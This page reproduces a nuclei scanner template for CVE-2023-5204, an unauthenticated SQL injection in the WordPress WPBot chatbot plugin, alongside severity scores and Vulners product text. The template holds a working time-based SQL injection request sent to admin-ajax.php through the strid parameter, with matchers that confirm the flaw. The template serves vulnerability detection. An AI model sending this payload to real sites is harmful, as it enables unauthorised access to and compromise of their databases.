Lucene search
K

WordPress AI ChatBot (WPBot) <= 4.8.9 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Unauthenticated SQL injection in WordPress WPBot plugin <=4.8.9 via strid parameter; update to fix.

Related
Refs
Code
id: CVE-2023-5204

info:
  name: WordPress AI ChatBot (WPBot) <= 4.8.9 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    ChatBot plugin for WordPress up to 4.8.9 contains a sql_injection caused by insufficient escaping and lack of preparation on the $strid parameter, letting unauthenticated attackers extract sensitive data, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries, leading to data disclosure and potential database compromise.
  remediation: |
    Update to the latest version of the plugin that addresses this vulnerability, or apply security patches provided by the vendor.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5204
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot/chatbot-489-unauthenticated-sql-injection-via-qc-wpbo-search-response
    - https://plugins.trac.wordpress.org/browser/chatbot/trunk/qcld-wpwbot-search.php?rev=2957286#L177
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5204
    epss-score: 0.06888
    epss-percentile: 0.93291
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,chatbot,wpbot,unauth,time-based

http:
  - raw:
      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpbo_search_response&name=test&keyword=test&strid=1 AND (SELECT 42 FROM (SELECT(SLEEP(8)))sqltest)

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains_all(body, "\"status\":\"success\"", "\"data\"")'
        condition: and
# digest: 4a0a00473045022100deab82b06a6c9e4abef0f4f15d5652be0350d9a9fe154d49ad03bc919efb0c130220685d94d6a33144eba6ac4769840d576a8e94b3e471b4e42797c80249091cbbf2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Feb 2026 15:29Current
7High risk
Vulners AI Score7
CVSS 3.17.5 - 9.8
EPSS0.06888
15